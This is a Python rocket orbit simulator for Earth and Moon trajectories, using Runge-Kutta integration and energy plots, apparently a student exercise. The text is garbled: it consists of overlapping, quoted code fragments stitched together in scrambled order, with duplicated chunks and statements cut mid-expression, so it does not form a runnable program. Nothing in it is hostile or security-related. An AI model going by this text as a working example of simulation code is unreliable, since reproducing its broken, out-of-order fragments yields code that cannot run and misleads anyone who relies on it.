F5(x[i],y[i]) k1vy =", "+ Ep[i+1] param = PrettyTable(['Min. Altitude above Earth (m)','Min. 
Altitude above Moon (m)'])", "k2y * 0.5) k3vy = F4(x[i] + h * k2x * 0.5, y[i]", "# Distance between Earth and the Moon (m) #dx/dt def F1(vx): return vx", "k2x * 0.5, y[i] + h * k2y * 0.5) k3vy = F6(x[i]", "single position variable 'r' v = np.hypot(vx,vy) # Velocities in the x and", "import numpy as np import matplotlib.pyplot as plt plt.style.use('dark_background') from prettytable import PrettyTable", "Moon') ax4.set_xlabel('Time (s)') ax4.set_ylabel('Energy (J)') ax4.plot(t,Ek, label = 'Kinetic Energy', color = 'lime')", "ax3.set_xlabel('Horizontal displacement') ax3.set_ylabel('Vertical displacement') ax3.plot(x,y, color = 'red') ax3.set_xlim([-5*rE,+1.2*d]) ax3.set_ylim([-0.5*d,+0.5*d]) earth = plt.Circle([0,0],", "of the rocket (kg) rM = 1.737e6 #radius of the moon (m) d", "i+1 iterations Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1] param = PrettyTable(['Min.", "+ h * k1x * 0.5, y[i] + h * k1y * 0.5)", "print(\"\"\" Please enter initial coordinates for your rocket:\"\"\") x0 = input(\"x = \")", "= -Me*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0] = Ek[0]+Ep[0] #Total energy is the", "v = np.hypot(vx,vy) # Velocities in the x and y directions compounded in", "are in m): (I reccommend starting with x = 7x10^6 and y =", "k3vx) k4y = F2(vy[i] + h * k3vy) k4vx = F3(x[i] + h", "* k2x * 0.5, y[i] + h * k2y * 0.5) #4 k4x", "= y[i] + (h/6) * (k1y + 2 * k2y + 2 *", "Test else: print(\"\"\" -------------------------- \"Successful Flight! --------------------------\"\"\") print(\"\"\" DATA\"\"\") apsides = PrettyTable(['Min. 
Altitude", "= F3(x[i] + h * k1x * 0.5, y[i] + h * k1y", "the Moon') ax4.set_xlabel('Time (s)') ax4.set_ylabel('Energy (J)') ax4.plot(t,Ek, label = 'Kinetic Energy', color =", "ax4.plot(t,Ek, label = 'Kinetic Energy', color = 'lime') ax4.plot(t,Ep, label = 'Potential Energy',", "F2(vy[i] + h * k3vy) k4vx = F3(x[i] + h * k3x, y[i]", "vy[0] = vy0 t[0] = 0 r = np.hypot(x,y) # x and y", "in m): (I reccommend starting with x = 7x10^6 and y = 0)\"\"\")", "* 0.5) k2vy = F4(x[i] + h * k1x * 0.5, y[i] +", "N=int(t1-t0/h) x, y, vx, vy, Ek, Ep, Et, t = np.zeros(N), np.zeros(N), np.zeros(N),", "= F3(x[i] + h * k2x * 0.5, y[i] + h * k2y", "(units are in m/s) (If the previously reccommended altitude is set then start", "* x * G) / (((x**2)+(y**2))**(3/2))) #dvy/dt including influence of the Moon def", "(enter 1 or 2): \\n 1. Earth \\n 2. Moon\"\"\") choice = input()", "= \") print(''' Calculating orbit... ''') h = 1 N=int(t1-t0/h) x, y, vx,", "reccommended altitude is set then start with x = 0, y = 7500)\"\"\")", "(x,y) print(\"\"\" Please enter initial velocities along the x and y axis (units", "python3 # -*- coding: utf-8 -*- \"\"\" Created on Wed Mar 4 10:37:05", "two # Part A RK4 Implementation for i in range (0, N-1): #1", "# Part A RK4 Implementation for i in range (0, N-1): #1 k1x", "* 0.5 * k1vy) k2vx = F3(x[i] + h * k1x * 0.5,", "= \") y0 = input(\"y = \") # Starting Velocities (x,y) print(\"\"\" Please", "k3x, y[i] + h * k3y) k4vy = F4(x[i] + h * k3x,", "k2vx) k3y = F2(vy[i] + h * 0.5 * k2vy) k3vx = F5(x[i]", "+ h * k1y * 0.5) k2vy = F6(x[i] + h * k1x", "(-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1] param = PrettyTable(['Min. 
Altitude above Earth (m)','Min.", "of the Moon def F5(x,y): return (-1*(Mm * (x-d) * G) / ((((x-d)**2)+(y**2))**(3/2)))", "* k3vy + k4vy) t[i+1] = t[i] + h r[i+1] = np.hypot(x[i+1],y[i+1]) v[i+1]", "B RK4 Implementation for i in range (0, N-1): #1 k1x = F1(vx[i])", "= 7x10^6 and y = 0)\"\"\") x0 = input(\"x = \") y0 =", "color = '#F700FF') ax2.legend() plt.show() Exercise_4() if choice == \"2\": h = 50", "\"2\": h = 50 N=int(t1-t0/h) x, y, vx, vy, Ek, Ep, Et, t", "np.zeros(N), np.zeros(N), np.zeros(N) x[0] = x0 y[0] = y0 vx[0] = vx0 vy[0]", "Earth (kg) rE = 6.371e6 #radius of earth (m) Mm = 7.348e22 #mass", "between Earth and the Moon (m) #dx/dt def F1(vx): return vx #dy/dt def", "0.5 * k2vy) k3vx = F3(x[i] + h * k2x * 0.5, y[i]", "0.5) k2vy = F6(x[i] + h * k1x * 0.5, y[i] + h", "= 1.737e6 #radius of the moon (m) d = 3.844e8 # Distance between", "rocket for i+1 iterations Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1] param", "#mass of the rocket (kg) rM = 1.737e6 #radius of the moon (m)", "y * G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me * y * G)", "-------------------------- \"Successful Flight! --------------------------\"\"\") print(\"\"\" DATA\"\"\") apsides = PrettyTable(['Min. 
Altitude (m)','Periapsis (m)','Apoapsis (m)'])", "+ h * 0.5 * k2vx) k3y = F2(vy[i] + h * 0.5", "= 'teal') ax1.add_artist(earth) ax1.set_xlim([-2*rE,+2*rE]) ax1.set_ylim([-2*rE,+2*rE]) fig2,ax2 = plt.subplots() ax2.set_title('Energy analysis of a rocket", "+ k4x) y[i+1] = y[i] + (h/6) * (k1y + 2 * k2y", "vx[i] + (h/6) * (k1vx + 2 * k2vx + 2 * k3vx", "0, y = 7500)\"\"\") vx0 = input(\"Vx = \") vy0 = input(\"Vy =", "return -1 * (Me * x * G) / (((x**2)+(y**2))**(3/2)) #dvy/dt def F4(x,y):", "= y0 vx[0] = vx0 vy[0] = vy0 t[0] = 0 r =", "h * k1x * 0.5, y[i] + h * k1y * 0.5) #3", "h * k1x * 0.5, y[i] + h * k1y * 0.5) k2vy", "Part B RK4 Implementation for i in range (0, N-1): #1 k1x =", "+ 2 * k2y + 2 * k3y + k4y) vx[i+1] = vx[i]", "Rocket Orbit of the Moon') ax4.set_xlabel('Time (s)') ax4.set_ylabel('Energy (J)') ax4.plot(t,Ek, label = 'Kinetic", "k2vx = F3(x[i] + h * k1x * 0.5, y[i] + h *", "for your rocket (units are in m): (I reccommend starting with x =", "Ep[0] = -Mm*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0] = Ek[0]+Ep[0] #Total energy is", "* 0.5 * k1vx) k2y = F2(vy[i] + h * 0.5 * k1vy)", "* k2vy + 2 * k3vy + k4vy) t[i+1] = t[i] + h", "Mm = 7.348e22 #mass of the Moon (kg) Mr = 5e3 #mass of", "k3vx = F3(x[i] + h * k2x * 0.5, y[i] + h *", "(-1 * (Me * x * G) / (((x**2)+(y**2))**(3/2))) #dvy/dt including influence of", "h = 1 N=int(t1-t0/h) x, y, vx, vy, t, Ek, Ep, Et =", "y * G) / (((x**2)+(y**2))**(3/2))) def Exercise_4(): t0 = 0 t1 = 1.85e4", "and y axis\"\"\") vx0 = input(\"Vx = \") vy0 = input(\"Vy = \")", "Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] = -Me*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0] =", "Ek[0]+Ep[0] #Total energy is the sum of these two # Part B RK4", "np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) x[0] = x0 y[0] = y0 vx[0] = vx0", "+ h * k3vy) k4vx = F5(x[i] + h * k3x, y[i] +", "(kg) rM = 1.737e6 #radius of the moon (m) d = 3.844e8 #", "compounded in a single position variable 'r' v = np.hypot(vx,vy) # 
Velocities in", "color = 'red') ax3.set_xlim([-5*rE,+1.2*d]) ax3.set_ylim([-0.5*d,+0.5*d]) earth = plt.Circle([0,0], rE, color = 'teal') moon", "enter initial coordinates for your rocket:\"\"\") x0 = input(\"x = \") y0 =", "* k1vy) k2vx = F5(x[i] + h * k1x * 0.5, y[i] +", "= x0 y[0] = y0 vx[0] = vx0 vy[0] = vy0 r =", "in the x and y directions compounded in single variable 'v' r[0] =", "= 0)\"\"\") x0 = input(\"x = \") y0 = input(\"y = \") #", "are in m/s) (If the previously reccommended altitude is set then start with", "of the Moon def F6(x,y): return (-1*(Mm * y * G) / ((((x-d)**2)+(y**2))**(3/2)))", "param = PrettyTable(['Min. Altitude above Earth (m)','Min. Altitude above Moon (m)']) param.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(abs(d-r))),]) print(param)", "x[0] = x0 y[0] = y0 vx[0] = vx0 vy[0] = vy0 r", "y[i] + h * k1y * 0.5) k2vy = F6(x[i] + h *", "v[0] = np.hypot(vx[0],vy[0]) #Energy Ek[0] = Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] = -Mm*Mr*G/r[0]", "0 r = np.hypot(x,y) # x and y coordinates compounded in a single", "coordinates compounded in a single position variable 'r' v = np.hypot(vx,vy) # Velocities", "the x and y axis\"\"\") vx0 = input(\"Vx = \") vy0 = input(\"Vy", "Part A RK4 Implementation for i in range (0, N-1): #1 k1x =", "single variable 'v' r[0] = np.hypot(x[0],y[0]) v[0] = np.hypot(vx[0],vy[0]) #Energy Ek[0] = Mr*(v[0]**2)/2", "0.5) #3 k3x = F1(vx[i] + h * 0.5 * k2vx) k3y =", "total energy of the rocket for i+1 iterations Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1] =", "0.5 * k2vx) k3y = F2(vy[i] + h * 0.5 * k2vy) k3vx", "h * k3vy) k4vx = F5(x[i] + h * k3x, y[i] + h", "Moon def F5(x,y): return (-1*(Mm * (x-d) * G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1", "5e3 #mass of the rocket (kg) rM = 1.737e6 #radius of the moon", "* k3y + k4y) vx[i+1] = vx[i] + (h/6) * (k1vx + 2", "0.5, y[i] + h * k2y * 0.5) k3vy = F6(x[i] + h", "= plt.subplots() ax3.set_title('Rocket Orbit of the Moon') ax3.set_xlabel('Horizontal displacement') 
ax3.set_ylabel('Vertical displacement') ax3.plot(x,y, color", "Rocket Orbit Simulator! Please select which body you wish your rocket to orbit", "rocket to orbit (enter 1 or 2): \\n 1. Earth \\n 2. Moon\"\"\")", "0 t1 = 1.85e4 print(\"\"\" Welcome to Alex's Rocket Orbit Simulator! Please select", "# Starting Velocities (x,y) print(\"\"\" Please enter initial velocities along the x and", "#Energy Ek[0] = Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] = -Me*Mr*G/r[0] #Gravitational potential energy", "F4(x[i] + h * k2x * 0.5, y[i] + h * k2y *", "* (Me * x * G) / (((x**2)+(y**2))**(3/2)) #dvy/dt def F4(x,y): return -1", "in range (0, N-1): #1 k1x = F1(vx[i]) k1y = F2(vy[i]) k1vx =", "N=int(t1-t0/h) x, y, vx, vy, t, Ek, Ep, Et = np.zeros(N), np.zeros(N), np.zeros(N),", "k4x = F1(vx[i] + h * k3vx) k4y = F2(vy[i] + h *", "k3vx +k4vx) vy[i+1] = vy[i] + (h/6) * (k1vy + 2 * k2vy", "k3vx = F5(x[i] + h * k2x * 0.5, y[i] + h *", "k3vy + k4vy) t[i+1] = t[i] + h r[i+1] = np.hypot(x[i+1],y[i+1]) v[i+1] =", "sum of these two # Part A RK4 Implementation for i in range", "* 0.5 * k2vx) k3y = F2(vy[i] + h * 0.5 * k2vy)", "h * k3y) x[i+1] = x[i] + (h/6) * (k1x + 2 *", "Flight! --------------------------\"\"\") print(\"\"\" DATA\"\"\") apsides = PrettyTable(['Min. Altitude (m)','Periapsis (m)','Apoapsis (m)']) apsides.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(r)),'{:.3}'.format(max(r))]) print(apsides)", "k2vx = F5(x[i] + h * k1x * 0.5, y[i] + h *", "and y directions compounded in single variable 'v' r[0] = np.hypot(x[0],y[0]) v[0] =", "= F1(vx[i] + h * 0.5 * k2vx) k3y = F2(vy[i] + h", "Earth (m)','Min. 
Altitude above Moon (m)']) param.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(abs(d-r))),]) print(param) fig3,ax3 = plt.subplots() ax3.set_title('Rocket Orbit", "h * 0.5 * k1vy) k2vx = F5(x[i] + h * k1x *", "-1 * (Me * x * G) / (((x**2)+(y**2))**(3/2)) #dvy/dt def F4(x,y): return", "F4(x[i] + h * k3x, y[i] + h * k3y) x[i+1] = x[i]", "body you wish your rocket to orbit (enter 1 or 2): \\n 1.", "earth = plt.Circle([0,0], rE, color = 'teal') ax1.add_artist(earth) ax1.set_xlim([-2*rE,+2*rE]) ax1.set_ylim([-2*rE,+2*rE]) fig2,ax2 = plt.subplots()", "h * k2x * 0.5, y[i] + h * k2y * 0.5) k3vy", "t[i+1] = t[i] + h r[i+1] = np.hypot(x[i+1],y[i+1]) v[i+1] = np.hypot(vx[i+1],vy[i+1]) #Energy Ek[i+1]", "return vy #dvx/dt def F3(x,y): return -1 * (Me * x * G)", "input(\"Vy = \") print(''' Calculating orbit... ''') x[0] = x0 y[0] = y0", "return -1 * (Me * y * G) / (((x**2)+(y**2))**(3/2)) #dvx/dt including influence", "+ 2 * k3vx +k4vx) vy[i+1] = vy[i] + (h/6) * (k1vy +", "vx[i+1] = vx[i] + (h/6) * (k1vx + 2 * k2vx + 2", "* k2vy) k3vx = F5(x[i] + h * k2x * 0.5, y[i] +", "orbit... ''') h = 1 N=int(t1-t0/h) x, y, vx, vy, t, Ek, Ep,", "+ (h/6) * (k1y + 2 * k2y + 2 * k3y +", "* k3x, y[i] + h * k3y) k4vy = F6(x[i] + h *", "<= rE : print(\"\"\" \"Your rocket has crashed!\"\"\") # Crash Test else: print(\"\"\"", "energy of the rocket for i+1 iterations Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1]", "earth = plt.Circle([0,0], rE, color = 'teal') moon = plt.Circle([d,0], rM, color =", "Et[i+1] = Ek[i+1] + Ep[i+1] param = PrettyTable(['Min. Altitude above Earth (m)','Min. Altitude", "+ h * k2x * 0.5, y[i] + h * k2y * 0.5)", "your rocket:\"\"\") x0 = input(\"x = \") y0 = input(\"y = \") #", "+ h r[i+1] = np.hypot(x[i+1],y[i+1]) v[i+1] = np.hypot(vx[i+1],vy[i+1]) #Energy Ek[i+1] = 0.5*Mr*(v[i+1]**2) #", "orbit... ''') x[0] = x0 y[0] = y0 vx[0] = vx0 vy[0] =", "0.5, y[i] + h * k2y * 0.5) #4 k4x = F1(vx[i] +", "Calculating orbit... 
''') x[0] = x0 y[0] = y0 vx[0] = vx0 vy[0]", "x, y, vx, vy, t, Ek, Ep, Et = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N),", "r[i+1] = np.hypot(x[i+1],y[i+1]) v[i+1] = np.hypot(vx[i+1],vy[i+1]) #Energy Ek[i+1] = 0.5*Mr*(v[i+1]**2) # Ek, Ep", "color = 'lime') ax4.plot(t,Ep, label = 'Potential Energy', color = 'cyan') ax4.plot(t,Et, label", "+k4vx) vy[i+1] = vy[i] + (h/6) * (k1vy + 2 * k2vy +", "= Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] = -Me*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0]", "* k3vx +k4vx) vy[i+1] = vy[i] + (h/6) * (k1vy + 2 *", "plt.show() Exercise_4() if choice == \"2\": h = 50 N=int(t1-t0/h) x, y, vx,", "k2vy) k3vx = F3(x[i] + h * k2x * 0.5, y[i] + h", "F5(x[i] + h * k3x, y[i] + h * k3y) k4vy = F6(x[i]", "Ek[0] = Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] = -Mm*Mr*G/r[0] #Gravitational potential energy (-GMm/r)", "y0 = input(\"y = \") # Starting Velocities (x,y) print(\"\"\" Please enter initial", "fig1,ax1 = plt.subplots() ax1.set_title('Rocket orbit of Earth') ax1.set_xlabel('x position (m)') ax1.set_ylabel('y position (m)')", "y * G) / (((x**2)+(y**2))**(3/2)) #dvx/dt including influence of the Moon def F5(x,y):", "= F4(x[i] + h * k3x, y[i] + h * k3y) x[i+1] =", "x0 y[0] = y0 vx[0] = vx0 vy[0] = vy0 t[0] = 0", "analysis of a rocket orbiting Earth') ax2.set_xlabel('Time (s)') ax2.set_ylabel('Energy (J)') ax2.plot(t,Ek, label =", "= -Mm*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0] = Ek[0]+Ep[0] #Total energy is the", "= F6(x[i] + h * k2x * 0.5, y[i] + h * k2y", "sum of these two # Part B RK4 Implementation for i in range", "displacement') ax3.plot(x,y, color = 'red') ax3.set_xlim([-5*rE,+1.2*d]) ax3.set_ylim([-0.5*d,+0.5*d]) earth = plt.Circle([0,0], rE, color =", "Ep[i+1] if min(r) <= rE : print(\"\"\" \"Your rocket has crashed!\"\"\") # Crash", "color = 'white') ax3.add_artist(earth) ax3.add_artist(moon) fig4,ax4 = plt.subplots() ax4.set_title('Energy analysis of Rocket Orbit", "v[0] = 
np.hypot(vx[0],vy[0]) #Energy Ek[0] = Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] = -Me*Mr*G/r[0]", "y axis\"\"\") vx0 = input(\"Vx = \") vy0 = input(\"Vy = \") print('''", "* k2vy) k3vx = F3(x[i] + h * k2x * 0.5, y[i] +", "* 0.5) #3 k3x = F1(vx[i] + h * 0.5 * k2vx) k3y", "= Ek[i+1] + Ep[i+1] if min(r) <= rE : print(\"\"\" \"Your rocket has", "= F5(x[i] + h * k3x, y[i] + h * k3y) k4vy =", "(-1 * (Me * y * G) / (((x**2)+(y**2))**(3/2))) def Exercise_4(): t0 =", "which body you wish your rocket to orbit (enter 1 or 2): \\n", "k1x = F1(vx[i]) k1y = F2(vy[i]) k1vx = F3(x[i],y[i]) k1vy = F4(x[i],y[i]) #2", "def F5(x,y): return (-1*(Mm * (x-d) * G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 *", "* y * G) / (((x**2)+(y**2))**(3/2))) def Exercise_4(): t0 = 0 t1 =", "the rocket for i+1 iterations Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1]", "* k1x * 0.5, y[i] + h * k1y * 0.5) k2vy =", "t[0] = 0 r = np.hypot(x,y) # x and y coordinates compounded in", "= np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) x[0] = x0 y[0]", "Velocities in the x and y directions compounded in single variable 'v' r[0]", "x and y axis (units are in m/s) (If the previously reccommended altitude", "v[i+1] = np.hypot(vx[i+1],vy[i+1]) #Energy Ek[i+1] = 0.5*Mr*(v[i+1]**2) # Ek, Ep and total energy", "F6(x,y): return (-1*(Mm * y * G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me", "Starting Velocities (x,y) print(\"\"\" Please enter initial velocities along the x and y", "initial coordinates for your rocket:\"\"\") x0 = input(\"x = \") y0 = input(\"y", "(h/6) * (k1x + 2 * k2x + 2 * k3x + k4x)", "= Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] = -Mm*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0]", "= vx0 vy[0] = vy0 t[0] = 0 r = np.hypot(x,y) # x", "r = np.hypot(x,y) # x and y coordinates compounded in a single position", "start with x = 0, y = 7500)\"\"\") vx0 = input(\"Vx = \")", "F1(vx[i] + h * 0.5 * k2vx) k3y = F2(vy[i] + h 
*", "+ 2 * k2vx + 2 * k3vx +k4vx) vy[i+1] = vy[i] +", "k2y = F2(vy[i] + h * 0.5 * k1vy) k2vx = F5(x[i] +", "k1vy) k2vx = F5(x[i] + h * k1x * 0.5, y[i] + h", "h r[i+1] = np.hypot(x[i+1],y[i+1]) v[i+1] = np.hypot(vx[i+1],vy[i+1]) #Energy Ek[i+1] = 0.5*Mr*(v[i+1]**2) # Ek,", "* G) / (((x**2)+(y**2))**(3/2)) #dvx/dt including influence of the Moon def F5(x,y): return", "(x-d) * G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me * x * G)", "* k2x * 0.5, y[i] + h * k2y * 0.5) k3vy =", "Alex \"\"\" import numpy as np import matplotlib.pyplot as plt plt.style.use('dark_background') from prettytable", "h * k2y * 0.5) #4 k4x = F1(vx[i] + h * k3vx)", "= input(\"Vy = \") print(''' Calculating orbit... ''') x[0] = x0 y[0] =", "'v' r[0] = np.hypot(x[0],y[0]) v[0] = np.hypot(vx[0],vy[0]) #Energy Ek[0] = Mr*(v[0]**2)/2 #Kinetic energy", "\") vy0 = input(\"Vy = \") print(''' Calculating orbit... ''') x[0] = x0", "F2(vy[i] + h * 0.5 * k1vy) k2vx = F5(x[i] + h *", "x[0] = x0 y[0] = y0 vx[0] = vx0 vy[0] = vy0 t[0]", "(s)') ax4.set_ylabel('Energy (J)') ax4.plot(t,Ek, label = 'Kinetic Energy', color = 'lime') ax4.plot(t,Ep, label", "k2y * 0.5) k3vy = F6(x[i] + h * k2x * 0.5, y[i]", "h * k2y * 0.5) k3vy = F4(x[i] + h * k2x *", "* G) / (((x**2)+(y**2))**(3/2))) #dvy/dt including influence of the Moon def F6(x,y): return", "+ Ep[i+1] if min(r) <= rE : print(\"\"\" \"Your rocket has crashed!\"\"\") #", "influence of the Moon def F5(x,y): return (-1*(Mm * (x-d) * G) /", "* 0.5 * k2vy) k3vx = F5(x[i] + h * k2x * 0.5,", "np.hypot(x,y) # x and y coordinates compounded in a single position variable 'r'", "np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) x[0] = x0 y[0] =", "= '#F700FF') ax2.legend() plt.show() Exercise_4() if choice == \"2\": h = 50 N=int(t1-t0/h)", "y[i] + h * k1y * 0.5) k2vy = F4(x[i] + h *", "Crash Test else: print(\"\"\" -------------------------- \"Successful Flight! 
--------------------------\"\"\") print(\"\"\" DATA\"\"\") apsides = PrettyTable(['Min.", "= \") vy0 = input(\"Vy = \") print(''' Calculating orbit... ''') h =", "(Me * y * G) / (((x**2)+(y**2))**(3/2)) #dvx/dt including influence of the Moon", "the Moon def F5(x,y): return (-1*(Mm * (x-d) * G) / ((((x-d)**2)+(y**2))**(3/2))) +", "rE : print(\"\"\" \"Your rocket has crashed!\"\"\") # Crash Test else: print(\"\"\" --------------------------", "plt.Circle([0,0], rE, color = 'teal') moon = plt.Circle([d,0], rM, color = 'white') ax3.add_artist(earth)", "Moon def F6(x,y): return (-1*(Mm * y * G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1", "rE, color = 'teal') ax1.add_artist(earth) ax1.set_xlim([-2*rE,+2*rE]) ax1.set_ylim([-2*rE,+2*rE]) fig2,ax2 = plt.subplots() ax2.set_title('Energy analysis of", "label = 'Potential Energy', color = 'cyan') ax4.plot(t,Et, label = 'Total Energy', color", "= vy0 r = np.hypot(x,y) # x and y coordinates compounded in a", "Alex's Rocket Orbit Simulator! Please select which body you wish your rocket to", "plt.style.use('dark_background') from prettytable import PrettyTable G = 6.674e-11 Me = 5.972e24 #mass of", "6.371e6 #radius of earth (m) Mm = 7.348e22 #mass of the Moon (kg)", "k1x * 0.5, y[i] + h * k1y * 0.5) k2vy = F4(x[i]", "Mr = 5e3 #mass of the rocket (kg) rM = 1.737e6 #radius of", "is the sum of these two # Part A RK4 Implementation for i", "y[i] + (h/6) * (k1y + 2 * k2y + 2 * k3y", "* (k1vx + 2 * k2vx + 2 * k3vx +k4vx) vy[i+1] =", "* 0.5) k3vy = F6(x[i] + h * k2x * 0.5, y[i] +", "#dvy/dt including influence of the Moon def F6(x,y): return (-1*(Mm * y *", "0.5 * k2vy) k3vx = F5(x[i] + h * k2x * 0.5, y[i]", "label = 'Kinetic Energy', color = 'lime') ax4.plot(t,Ep, label = 'Potential Energy', color", "#2 k2x = F1(vx[i] + h * 0.5 * k1vx) k2y = F2(vy[i]", "* k2x + 2 * k3x + k4x) y[i+1] = y[i] + (h/6)", "ax1.set_xlabel('x position (m)') ax1.set_ylabel('y position (m)') ax1.plot(x,y, color = 'red') ax1.axis('equal') earth =", "/ 
((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me * x * G) / (((x**2)+(y**2))**(3/2))) #dvy/dt", "= F4(x[i],y[i]) #2 k2x = F1(vx[i] + h * 0.5 * k1vx) k2y", "ax2.legend() plt.show() Exercise_4() if choice == \"2\": h = 50 N=int(t1-t0/h) x, y,", "* k3vx) k4y = F2(vy[i] + h * k3vy) k4vx = F5(x[i] +", "#Kinetic energy (1/2MV**2) Ep[0] = -Me*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0] = Ek[0]+Ep[0]", "k1vx) k2y = F2(vy[i] + h * 0.5 * k1vy) k2vx = F3(x[i]", "G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me * x * G) / (((x**2)+(y**2))**(3/2)))", "axis (units are in m/s) (If the previously reccommended altitude is set then", "= y0 vx[0] = vx0 vy[0] = vy0 r = np.hypot(x,y) # x", "'lime') ax2.plot(t,Ep, label = 'Potential Energy', color = 'cyan') ax2.plot(t,Et, label = 'Total", "h * k3x, y[i] + h * k3y) k4vy = F6(x[i] + h", "'lime') ax4.plot(t,Ep, label = 'Potential Energy', color = 'cyan') ax4.plot(t,Et, label = 'Total", "+ h * 0.5 * k2vy) k3vx = F5(x[i] + h * k2x", "the Moon def F6(x,y): return (-1*(Mm * y * G) / ((((x-d)**2)+(y**2))**(3/2))) +", "Please select which body you wish your rocket to orbit (enter 1 or", "print(\"\"\" Please enter initial coordinates for your rocket (units are in m): (I", "x = 0, y = 7500)\"\"\") vx0 = input(\"Vx = \") vy0 =", "* k2vx) k3y = F2(vy[i] + h * 0.5 * k2vy) k3vx =", "* 0.5) #4 k4x = F1(vx[i] + h * k3vx) k4y = F2(vy[i]", "print(''' Calculating orbit... ''') h = 1 N=int(t1-t0/h) x, y, vx, vy, t,", "Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] = -Mm*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0] =", "choice = input() if choice == \"1\": # Starting Coordinates (x,y) print(\"\"\" Please", "= np.hypot(x,y) # x and y coordinates compounded in a single position variable", "= plt.subplots() ax1.set_title('Rocket orbit of Earth') ax1.set_xlabel('x position (m)') ax1.set_ylabel('y position (m)') ax1.plot(x,y,", "0.5) #4 k4x = F1(vx[i] + h * k3vx) k4y = F2(vy[i] +", "you wish your rocket to orbit (enter 1 or 2): \\n 1. 
Earth", "PrettyTable G = 6.674e-11 Me = 5.972e24 #mass of the Earth (kg) rE", "= 1.85e4 print(\"\"\" Welcome to Alex's Rocket Orbit Simulator! Please select which body", "50 N=int(t1-t0/h) x, y, vx, vy, Ek, Ep, Et, t = np.zeros(N), np.zeros(N),", "h * k1y * 0.5) k2vy = F4(x[i] + h * k1x *", "param.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(abs(d-r))),]) print(param) fig3,ax3 = plt.subplots() ax3.set_title('Rocket Orbit of the Moon') ax3.set_xlabel('Horizontal displacement') ax3.set_ylabel('Vertical", "y0 vx[0] = vx0 vy[0] = vy0 r = np.hypot(x,y) # x and", "energy is the sum of these two # Part B RK4 Implementation for", "of the Earth (kg) rE = 6.371e6 #radius of earth (m) Mm =", "vx0 vy[0] = vy0 t[0] = 0 r = np.hypot(x,y) # x and", "vy0 = input(\"Vy = \") print(''' Calculating orbit... ''') x[0] = x0 y[0]", "the moon (m) d = 3.844e8 # Distance between Earth and the Moon", "= F4(x[i] + h * k1x * 0.5, y[i] + h * k1y", "# Part B RK4 Implementation for i in range (0, N-1): #1 k1x", "2 * k2vx + 2 * k3vx +k4vx) vy[i+1] = vy[i] + (h/6)", "k3vy = F4(x[i] + h * k2x * 0.5, y[i] + h *", "= plt.subplots() ax2.set_title('Energy analysis of a rocket orbiting Earth') ax2.set_xlabel('Time (s)') ax2.set_ylabel('Energy (J)')", "= F2(vy[i] + h * 0.5 * k1vy) k2vx = F3(x[i] + h", "= 'red') ax3.set_xlim([-5*rE,+1.2*d]) ax3.set_ylim([-0.5*d,+0.5*d]) earth = plt.Circle([0,0], rE, color = 'teal') moon =", "#radius of the moon (m) d = 3.844e8 # Distance between Earth and", "input(\"Vx = \") vy0 = input(\"Vy = \") print(''' Calculating orbit... 
''') x[0]", "h * 0.5 * k2vy) k3vx = F3(x[i] + h * k2x *", "Distance between Earth and the Moon (m) #dx/dt def F1(vx): return vx #dy/dt", "#dvy/dt def F4(x,y): return -1 * (Me * y * G) / (((x**2)+(y**2))**(3/2))", "t, Ek, Ep, Et = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N)", "(Me * x * G) / (((x**2)+(y**2))**(3/2))) #dvy/dt including influence of the Moon", "= F2(vy[i] + h * 0.5 * k1vy) k2vx = F5(x[i] + h", "0.5, y[i] + h * k1y * 0.5) k2vy = F6(x[i] + h", "Moon') ax3.set_xlabel('Horizontal displacement') ax3.set_ylabel('Vertical displacement') ax3.plot(x,y, color = 'red') ax3.set_xlim([-5*rE,+1.2*d]) ax3.set_ylim([-0.5*d,+0.5*d]) earth =", "ax3.add_artist(moon) fig4,ax4 = plt.subplots() ax4.set_title('Energy analysis of Rocket Orbit of the Moon') ax4.set_xlabel('Time", "of a rocket orbiting Earth') ax2.set_xlabel('Time (s)') ax2.set_ylabel('Energy (J)') 